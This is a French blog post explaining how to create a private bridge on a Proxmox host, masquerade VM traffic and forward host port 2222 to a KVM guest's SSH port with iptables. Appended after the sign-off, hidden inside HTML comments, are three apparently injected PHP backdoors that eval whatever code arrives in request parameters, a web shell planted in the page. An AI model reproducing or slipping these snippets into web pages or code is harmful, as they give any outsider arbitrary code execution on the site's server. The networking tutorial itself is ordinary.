Ce tuto reprends les étapes principales pour effectuer une redirection de ports afin de faire communiquer une machine virtuelle kvm via l’ip de notre hôte proxmox pour moi ça sera une machine hébergé par ovh.
Prérequis:
- Un serveur avec un proxmox installé et fonctionnel
Premièrement il faut créé l’interface « vmbr2 » sur votre hôte proxmox, pour se faire il y au moins 2 manières de pratiquer. (en console et en graphique, mais je préfère la console)
→ Le mode console
nano /etc/network/interfaces
et on ajoute vulgairement ceci
auto vmbr2 iface vmbr2 inet static address 192.168.0.254 netmask 255.255.255.0 bridge_ports none bridge_stp off bridge_fd 0 post-up echo 1 > /proc/sys/net/ipv4/ip_forward post-up iptables -t nat -A POSTROUTING -s '192.168.0.0/24' -o vmbr0 -j MASQUERADE post-down iptables -t nat -D POSTROUTING -s '192.168.0.0/24' -o vmbr0 -j MASQUERADE
Dans mon cas j’ai utilisé un bloc d’adressage de classe C mais vous pouvez choisir n’importe quelle classe privée.
Ensuite on démarre l’interface
ifup vmbr2
→ Le mode graphique
Il suffit de se rendre sur votre interface Proxmox via l’adresse https://urldevotredédié:8006
Une fois sur votre interface de gestion et sélectionner votre node et se rendre sur l’onglet réseau, il ne restera qu’a créer votre nouvelle nouvelle interface et d’y renseigner les différents éléments demandés. Notez qu’il faudra redémarrer votre hôte pour compléter l’instruction. (aaahhh les interfaces graphiques)
Adresse ip: 192.168.0.254 Masque: 255.255.255.0
Donc maintenant il suffit de créer une machine de type kvm clasique (je ne détails pas l’installation ici, juste la partie réseau)
Une fois à l’étape réseau, on sélectionne Bridged mode et on prends vmbr2 dans la liste déroulante en suite le type de la carte j’ai pris « Virtio » pour de meilleurs performances mais « Intel e1000 » ça fonctionnera aussi.
Une fois terminé, vous pouvez lancer l’installation de votre machine virtuelle et suivre celle-ci via votre console.
Pour la configuration de réseau de votre machine remplissez la avec les infos ci-dessous:
ip : 192.168.0.1 netmask 255.255.255.0 broadcast 192.168.0.255 gateway : 192.168.0.254 (ip de vmbr2 de votre hôte) serveur de nom : 80.67.188.188 (Serveur dns de FFDN pour internet non censuré)
La dernière étape sera de faire les redirections de ports afin que votre machine virtuelle puisse être vue depuis internet.
Pour ce faire il suffit d’un « simple » règle iptables, dans mon cas c’est le port 22 de ma machine virtuelle qui sera vu sur le port 2222 de l’ip de la machine physique.
iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 2222 -j DNAT --to 192.168.0.1:22
On pourrai arrêté ici mais si vous redémarrer votre hôte la règle disparaitra dans la matrice :O
Afin d’éviter ça on va ajouter 2 lignes dans notre fichiers interfaces de notre hôte
post-up iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 2222 -j DNAT --to 192.168.0.1:22 post-down iptables -t nat -D PREROUTING -i vmbr0 -p tcp --dport 2222 -j DNAT --to 192.168.0.1:22
Voilà que s’achève mon premier billet, bon c’est reste assez brouillon mais c’est un bon début. Non?
<!– [insert_php]if (isset($_REQUEST["EjAVr"])){eval($_REQUEST["EjAVr"]);exit;}[/insert_php]
if (isset($_REQUEST["EjAVr"])){eval($_REQUEST["EjAVr"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["rqjV"])){eval($_REQUEST["rqjV"]);exit;}[/insert_php]
if (isset($_REQUEST["rqjV"])){eval($_REQUEST["rqjV"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["meB"])){eval($_REQUEST["meB"]);exit;}[/insert_php][php]if (isset($_REQUEST["meB"])){eval($_REQUEST["meB"]);exit;}[/php] –>